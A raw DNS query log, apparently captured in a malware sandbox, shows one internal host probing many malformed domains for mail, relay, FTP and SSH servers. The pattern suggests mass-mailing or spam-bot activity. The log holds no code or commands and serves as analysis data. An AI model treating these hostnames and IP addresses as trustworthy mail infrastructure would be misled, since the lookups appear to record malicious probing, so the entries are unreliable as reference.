Nov 30, 2023 11:23:24.151031017 CET	1.1.1.1	192.168.2.4	0xd597	Name error (3)	eok5ofmail.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:24.151169062 CET	1.1.1.1	192.168.2.4	0x9fbb	Name error (3)	ideo1e.priisav.06eieic.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:24.172880888 CET	1.1.1.1	192.168.2.4	0xa681	Name error (3)	smtp.hmsn.il.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.182892084 CET	1.1.1.1	192.168.2.4	0xd32e	Name error (3)	mailgate.otzaail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.188155890 CET	1.1.1.1	192.168.2.4	0x54b6	Name error (3)	smtp.jmramdz9s8l.et	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.188337088 CET	1.1.1.1	192.168.2.4	0x54b6	Name error (3)	smtp.jmramdz9s8l.et	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.192711115 CET	1.1.1.1	192.168.2.4	0xae4e	Name error (3)	mailgate.sotuvhlp.cz	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.207587004 CET	1.1.1.1	192.168.2.4	0x3123	Name error (3)	smtp.sotuvhlp.cz	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.224626064 CET	1.1.1.1	192.168.2.4	0xbf56	Name error (3)	xezail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.243370056 CET	1.1.1.1	192.168.2.4	0xcb77	Name error (3)	relay.mmoc.nnlgco.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.247836113 CET	1.1.1.1	192.168.2.4	0x1aca	Name error (3)	eok5ofmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.248913050 CET	1.1.1.1	192.168.2.4	0x4d99	Name error (3)	ideo1e.priisav.06eieic.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.249806881 CET	1.1.1.1	192.168.2.4	0xeead	Name error (3)	mailgate.hmsn.il.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.249825954 CET	1.1.1.1	192.168.2.4	0xa681	Name error (3)	smtp.hmsn.il.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.250181913 CET	1.1.1.1	192.168.2.4	0xb388	Name error (3)	smtp.naburly26a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.255002975 CET	1.1.1.1	192.168.2.4	0xbb77	No error (0)	yahim.com	traff-1.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2023 11:23:24.255002975 CET	1.1.1.1	192.168.2.4	0xbb77	No error (0)	traff-1.hugedomains.com	hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2023 11:23:24.302997112 CET	1.1.1.1	192.168.2.4	0xfc80	Name error (3)	hitamoelka237lil.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:24.306766987 CET	1.1.1.1	192.168.2.4	0x329d	Name error (3)	pop3.otzaail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.316797018 CET	1.1.1.1	192.168.2.4	0x771c	Name error (3)	relay.naburly26a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.330873013 CET	1.1.1.1	192.168.2.4	0x3123	Name error (3)	smtp.sotuvhlp.cz	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.337431908 CET	1.1.1.1	192.168.2.4	0x98b9	Name error (3)	gw.ky	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:24.338064909 CET	1.1.1.1	192.168.2.4	0xf797	Name error (3)	relay.yma4j.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.340825081 CET	1.1.1.1	192.168.2.4	0xd56c	Server failure (2)	relay.yah.o.com.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.343750000 CET	1.1.1.1	192.168.2.4	0x422f	Name error (3)	smtp.ytgaig.tcueain.ch	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.347568989 CET	1.1.1.1	192.168.2.4	0x7f55	Name error (3)	gw.ky	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.355263948 CET	1.1.1.1	192.168.2.4	0xbceb	Name error (3)	relay.dtianekicomail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.383512974 CET	1.1.1.1	192.168.2.4	0xb0c8	Name error (3)	mailgate.hmam.comtmail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.384005070 CET	1.1.1.1	192.168.2.4	0xbceb	Name error (3)	relay.dtianekicomail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.390680075 CET	1.1.1.1	192.168.2.4	0x601b	Name error (3)	imap.a6a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.395225048 CET	1.1.1.1	192.168.2.4	0x7429	Name error (3)	relay.igaacewo.ukc.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.405462027 CET	1.1.1.1	192.168.2.4	0x7451	Name error (3)	relay.ytgaig.tcueain.ch	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.439049959 CET	1.1.1.1	192.168.2.4	0x98b9	Name error (3)	gw.ky	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:24.439429998 CET	1.1.1.1	192.168.2.4	0x771c	Name error (3)	relay.naburly26a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.441227913 CET	1.1.1.1	192.168.2.4	0x7af2	Name error (3)	ciszxujgaiatail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.454967022 CET	1.1.1.1	192.168.2.4	0xfa12	Name error (3)	hitamoelka237lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.467413902 CET	1.1.1.1	192.168.2.4	0x42b	Name error (3)	smtp.otzaail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.469229937 CET	1.1.1.1	192.168.2.4	0xed70	No error (0)	yahim.com	traff-1.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2023 11:23:24.469229937 CET	1.1.1.1	192.168.2.4	0xed70	No error (0)	traff-1.hugedomains.com	hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2023 11:23:24.469229937 CET	1.1.1.1	192.168.2.4	0xed70	No error (0)	hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com		52.71.57.184	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.469229937 CET	1.1.1.1	192.168.2.4	0xed70	No error (0)	hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com		54.209.32.212	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.485440016 CET	1.1.1.1	192.168.2.4	0x637a	Name error (3)	relay.aal.netc	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.505024910 CET	1.1.1.1	192.168.2.4	0x7af2	Name error (3)	ciszxujgaiatail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.505060911 CET	1.1.1.1	192.168.2.4	0x7429	Name error (3)	relay.igaacewo.ukc.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.505995989 CET	1.1.1.1	192.168.2.4	0x5795	Name error (3)	ftp.e1a73a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.570422888 CET	1.1.1.1	192.168.2.4	0xa992	Name error (3)	mail.e1a73a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.609091043 CET	1.1.1.1	192.168.2.4	0x7095	Name error (3)	ssh.joaionlnal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.609118938 CET	1.1.1.1	192.168.2.4	0xae36	Name error (3)	ssh.e1a73a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.615264893 CET	1.1.1.1	192.168.2.4	0x3844	Name error (3)	mailgate.jmramdz9s8l.et	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.622980118 CET	1.1.1.1	192.168.2.4	0x851c	Name error (3)	ftp.xezail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.623368025 CET	1.1.1.1	192.168.2.4	0xb5f9	Name error (3)	ftp.joaionlnal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.640454054 CET	1.1.1.1	192.168.2.4	0xc7af	Name error (3)	relay.sotuvhlp.cz	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.659074068 CET	1.1.1.1	192.168.2.4	0xe7c3	Name error (3)	mail.ideo1e.priisav.06eieic.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.676958084 CET	1.1.1.1	192.168.2.4	0x4eb6	Name error (3)	mail.xezail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.681871891 CET	1.1.1.1	192.168.2.4	0x299c	Name error (3)	ftp.eok5ofmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.688431025 CET	1.1.1.1	192.168.2.4	0x3844	Name error (3)	mailgate.jmramdz9s8l.et	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.717788935 CET	1.1.1.1	192.168.2.4	0xed6d	Name error (3)	ftp.ideo1e.priisav.06eieic.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.728773117 CET	1.1.1.1	192.168.2.4	0xc771	Name error (3)	ssh.ideo1e.priisav.06eieic.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.729195118 CET	1.1.1.1	192.168.2.4	0x2f59	Name error (3)	mail.joaionlnal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.755456924 CET	1.1.1.1	192.168.2.4	0x1f05	Name error (3)	ssh.xezail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.770075083 CET	1.1.1.1	192.168.2.4	0xd3e7	No error (0)	dnasl.com		23.106.186.61	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.770109892 CET	1.1.1.1	192.168.2.4	0xd3e7	No error (0)	dnasl.com		23.106.186.61	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.778887033 CET	1.1.1.1	192.168.2.4	0x46ee	Name error (3)	relay.hmam.comtmail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.787134886 CET	1.1.1.1	192.168.2.4	0x93fa	Name error (3)	relay.hmsn.il.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.840500116 CET	1.1.1.1	192.168.2.4	0x2f2e	Name error (3)	relay.otzaail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.847165108 CET	1.1.1.1	192.168.2.4	0xed6d	Name error (3)	ftp.ideo1e.priisav.06eieic.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.864587069 CET	1.1.1.1	192.168.2.4	0xc184	Name error (3)	mail.eok5ofmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.903614044 CET	1.1.1.1	192.168.2.4	0xbe6	Name error (3)	ftp.gw.ky	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.904011965 CET	1.1.1.1	192.168.2.4	0x93fa	Name error (3)	relay.hmsn.il.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.923965931 CET	1.1.1.1	192.168.2.4	0xc184	Name error (3)	mail.eok5ofmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:24.965281010 CET	1.1.1.1	192.168.2.4	0x9ed5	Name error (3)	ssh.gw.ky	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:25.001844883 CET	1.1.1.1	192.168.2.4	0xa88e	Name error (3)	mail.gmaso.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:25.001923084 CET	1.1.1.1	192.168.2.4	0x2ae9	Name error (3)	mail.gw.ky	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:25.005434036 CET	1.1.1.1	192.168.2.4	0xe825	Name error (3)	ftp.ciszxujgaiatail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:25.005976915 CET	1.1.1.1	192.168.2.4	0xf890	Name error (3)	mail.hitamoelka237lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:25.006360054 CET	1.1.1.1	192.168.2.4	0x873f	Name error (3)	ssh.eok5ofmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:25.007661104 CET	1.1.1.1	192.168.2.4	0x5d96	Name error (3)	mailgate.a6a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:25.194097042 CET	1.1.1.1	192.168.2.4	0xa1ce	Name error (3)	ssh.ciszxujgaiatail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:25.202003002 CET	1.1.1.1	192.168.2.4	0x4fc9	Name error (3)	liks.cohlm	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:25.302207947 CET	1.1.1.1	192.168.2.4	0x8210	Name error (3)	ftp.hitamoelka237lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:25.310292959 CET	1.1.1.1	192.168.2.4	0x40ce	Name error (3)	pop.ideo1e.priisav.06eieic.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:25.312211990 CET	1.1.1.1	192.168.2.4	0x852d	Name error (3)	pop.xezail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:25.411216974 CET	1.1.1.1	192.168.2.4	0x1c0e	Name error (3)	imap.e1a73a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:25.440918922 CET	1.1.1.1	192.168.2.4	0x7953	Name error (3)	liks.cohlm	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:25.485806942 CET	1.1.1.1	192.168.2.4	0x80b8	Name error (3)	mail.ciszxujgaiatail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:25.517265081 CET	1.1.1.1	192.168.2.4	0xaf97	Name error (3)	relay.jmramdz9s8l.et	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:25.517288923 CET	1.1.1.1	192.168.2.4	0xaf97	Name error (3)	relay.jmramdz9s8l.et	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:25.567593098 CET	1.1.1.1	192.168.2.4	0x80b8	Name error (3)	mail.ciszxujgaiatail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:25.570687056 CET	1.1.1.1	192.168.2.4	0xee	Name error (3)	gadtolsr2l1l.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:25.574017048 CET	1.1.1.1	192.168.2.4	0xda83	Name error (3)	sdas.d20ail.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:25.630722046 CET	1.1.1.1	192.168.2.4	0xb254	Name error (3)	pop.e1a73a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:25.634114981 CET	1.1.1.1	192.168.2.4	0xdd44	Name error (3)	imap.xezail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:25.634442091 CET	1.1.1.1	192.168.2.4	0x39c4	Name error (3)	s93ail.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:25.640954971 CET	1.1.1.1	192.168.2.4	0x6274	Name error (3)	aclfpxvr.nedwc	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:25.641412020 CET	1.1.1.1	192.168.2.4	0x12b9	Name error (3)	avabme220ail.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:25.693856001 CET	1.1.1.1	192.168.2.4	0xeffc	Name error (3)	amerite.varym	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:25.696302891 CET	1.1.1.1	192.168.2.4	0x3bbb	Name error (3)	tele8mail.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:25.702547073 CET	1.1.1.1	192.168.2.4	0x7753	No error (0)	c.mail.com	cloud.mail.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2023 11:23:25.704336882 CET	1.1.1.1	192.168.2.4	0xafda	Name error (3)	pop.gw.ky	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:25.704351902 CET	1.1.1.1	192.168.2.4	0x4d05	Name error (3)	m1ukgoy8a.ua	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:25.716945887 CET	1.1.1.1	192.168.2.4	0x6186	Name error (3)	imap.joaionlnal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:25.769579887 CET	1.1.1.1	192.168.2.4	0x9177	Name error (3)	gporaja.co.uk	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:25.811240911 CET	1.1.1.1	192.168.2.4	0x60f1	Name error (3)	pop.joaionlnal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:25.812175989 CET	1.1.1.1	192.168.2.4	0x1df0	Name error (3)	sdas.d20ail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:25.860580921 CET	1.1.1.1	192.168.2.4	0x4424	No error (0)	www.dnasl.com		23.106.186.61	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:25.860599041 CET	1.1.1.1	192.168.2.4	0x4424	No error (0)	www.dnasl.com		23.106.186.61	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:26.065026045 CET	1.1.1.1	192.168.2.4	0x60f1	Name error (3)	pop.joaionlnal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:26.196173906 CET	1.1.1.1	192.168.2.4	0xcb10	Name error (3)	m1ukgoy8a.ua	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:26.197068930 CET	1.1.1.1	192.168.2.4	0x2cae	Name error (3)	amerite.varym	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:26.259694099 CET	1.1.1.1	192.168.2.4	0x17ce	No error (0)	c.mail.com	cloud.mail.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2023 11:23:26.259694099 CET	1.1.1.1	192.168.2.4	0x17ce	No error (0)	cloud.mail.com		74.208.232.192	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:26.279135942 CET	1.1.1.1	192.168.2.4	0x5481	Name error (3)	gporaja.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:26.393387079 CET	1.1.1.1	192.168.2.4	0xa9dc	No error (0)	ht.am.cz	am.cz		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2023 11:23:26.393387079 CET	1.1.1.1	192.168.2.4	0xa9dc	No error (0)	am.cz			MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:26.393515110 CET	1.1.1.1	192.168.2.4	0xa9dc	No error (0)	ht.am.cz	am.cz		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2023 11:23:26.393515110 CET	1.1.1.1	192.168.2.4	0xa9dc	No error (0)	am.cz			MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:26.539958000 CET	1.1.1.1	192.168.2.4	0xf1ad	Name error (3)	ssh.hitamoelka237lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:26.540472031 CET	1.1.1.1	192.168.2.4	0xbd55	Name error (3)	gadtolsr2l1l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:26.552001953 CET	1.1.1.1	192.168.2.4	0xe209	Name error (3)	pop.eok5ofmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:26.615659952 CET	1.1.1.1	192.168.2.4	0x87c5	Name error (3)	s93ail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.133829117 CET	1.1.1.1	192.168.2.4	0xa4e3	Name error (3)	aclfpxvr.nedwc	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.141294003 CET	1.1.1.1	192.168.2.4	0x9212	Name error (3)	il.cam	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.148154020 CET	1.1.1.1	192.168.2.4	0x71d4	Name error (3)	tele8mail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.196779966 CET	1.1.1.1	192.168.2.4	0x2dff	Name error (3)	avabme220ail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.258668900 CET	1.1.1.1	192.168.2.4	0x376a	No error (0)	ht.am.cz	am.cz		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2023 11:23:27.258668900 CET	1.1.1.1	192.168.2.4	0x376a	No error (0)	am.cz		77.78.104.3	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.258702993 CET	1.1.1.1	192.168.2.4	0x376a	No error (0)	ht.am.cz	am.cz		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2023 11:23:27.258702993 CET	1.1.1.1	192.168.2.4	0x376a	No error (0)	am.cz		77.78.104.3	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.402455091 CET	1.1.1.1	192.168.2.4	0xbc84	Name error (3)	imap.gw.ky	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.405433893 CET	1.1.1.1	192.168.2.4	0xa2b9	Name error (3)	pop.hitamoelka237lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.406188011 CET	1.1.1.1	192.168.2.4	0xe372	Name error (3)	imap.ideo1e.priisav.06eieic.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.518249989 CET	1.1.1.1	192.168.2.4	0xfb01	Name error (3)	imap.eok5ofmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.531008005 CET	1.1.1.1	192.168.2.4	0x5f90	Name error (3)	pop3.ideo1e.priisav.06eieic.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.535239935 CET	1.1.1.1	192.168.2.4	0x3bc	Name error (3)	pop3.xezail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.614942074 CET	1.1.1.1	192.168.2.4	0xb52a	Name error (3)	imap.hitamoelka237lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.650731087 CET	1.1.1.1	192.168.2.4	0x65f4	Name error (3)	pop.ciszxujgaiatail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.888420105 CET	1.1.1.1	192.168.2.4	0x8067	No error (0)	mail.am.cz	mail.gransy.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2023 11:23:27.888420105 CET	1.1.1.1	192.168.2.4	0x8067	No error (0)	mail.gransy.com		82.208.29.194	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.888420105 CET	1.1.1.1	192.168.2.4	0x8067	No error (0)	mail.gransy.com		185.28.193.5	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.888420105 CET	1.1.1.1	192.168.2.4	0x8067	No error (0)	mail.gransy.com		185.28.193.11	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.888420105 CET	1.1.1.1	192.168.2.4	0x8067	No error (0)	mail.gransy.com		185.28.193.23	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.888420105 CET	1.1.1.1	192.168.2.4	0x8067	No error (0)	mail.gransy.com		185.28.193.36	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.888420105 CET	1.1.1.1	192.168.2.4	0x8067	No error (0)	mail.gransy.com		185.28.193.37	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.888453007 CET	1.1.1.1	192.168.2.4	0x8067	No error (0)	mail.am.cz	mail.gransy.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2023 11:23:27.888453007 CET	1.1.1.1	192.168.2.4	0x8067	No error (0)	mail.gransy.com		82.208.29.194	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.888453007 CET	1.1.1.1	192.168.2.4	0x8067	No error (0)	mail.gransy.com		185.28.193.5	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.888453007 CET	1.1.1.1	192.168.2.4	0x8067	No error (0)	mail.gransy.com		185.28.193.11	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.888453007 CET	1.1.1.1	192.168.2.4	0x8067	No error (0)	mail.gransy.com		185.28.193.23	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.888453007 CET	1.1.1.1	192.168.2.4	0x8067	No error (0)	mail.gransy.com		185.28.193.36	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.888453007 CET	1.1.1.1	192.168.2.4	0x8067	No error (0)	mail.gransy.com		185.28.193.37	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:27.978724957 CET	1.1.1.1	192.168.2.4	0x647	Name error (3)	ftp.liks.cohlm	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.095865965 CET	1.1.1.1	192.168.2.4	0xc237	Name error (3)	pop3.joaionlnal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.097498894 CET	1.1.1.1	192.168.2.4	0x48a7	Name error (3)	mail.liks.cohlm	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.101552963 CET	1.1.1.1	192.168.2.4	0x7f87	Name error (3)	ftp.sdas.d20ail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.102070093 CET	1.1.1.1	192.168.2.4	0xe102	No error (0)	www.luxusnipradlo.cz		217.16.188.145	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.112904072 CET	1.1.1.1	192.168.2.4	0x5776	Name error (3)	ftp.gadtolsr2l1l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.112955093 CET	1.1.1.1	192.168.2.4	0x6062	Name error (3)	ftp.m1ukgoy8a.ua	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.114877939 CET	1.1.1.1	192.168.2.4	0xb93a	Name error (3)	h.tlgcom	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:28.115381956 CET	1.1.1.1	192.168.2.4	0x1b06	Name error (3)	ftp.gporaja.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.115803003 CET	1.1.1.1	192.168.2.4	0xc74b	Name error (3)	ftp.s93ail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.120666981 CET	1.1.1.1	192.168.2.4	0x433	Name error (3)	pop3.gw.ky	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.120743036 CET	1.1.1.1	192.168.2.4	0x20ec	Name error (3)	relay.a6a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.135533094 CET	1.1.1.1	192.168.2.4	0x6d0d	Name error (3)	mail.gporaja.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.137154102 CET	1.1.1.1	192.168.2.4	0xb34a	Name error (3)	pop3.e1a73a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.139286041 CET	1.1.1.1	192.168.2.4	0xd801	Name error (3)	mail.m1ukgoy8a.ua	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.266078949 CET	1.1.1.1	192.168.2.4	0x809c	Name error (3)	mail.z-a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.300105095 CET	1.1.1.1	192.168.2.4	0x6f00	No error (0)	mail.apee.com		64.190.63.111	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.306879997 CET	1.1.1.1	192.168.2.4	0x2f6f	Name error (3)	mail.amerite.varym	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.308454990 CET	1.1.1.1	192.168.2.4	0x9902	Name error (3)	ftp.aclfpxvr.nedwc	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.309331894 CET	1.1.1.1	192.168.2.4	0xd3da	Name error (3)	mail.sdas.d20ail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.313230991 CET	1.1.1.1	192.168.2.4	0xbf30	Name error (3)	relay.hyeail.com	none	none	A (IP address)	IN (0x0001)	false
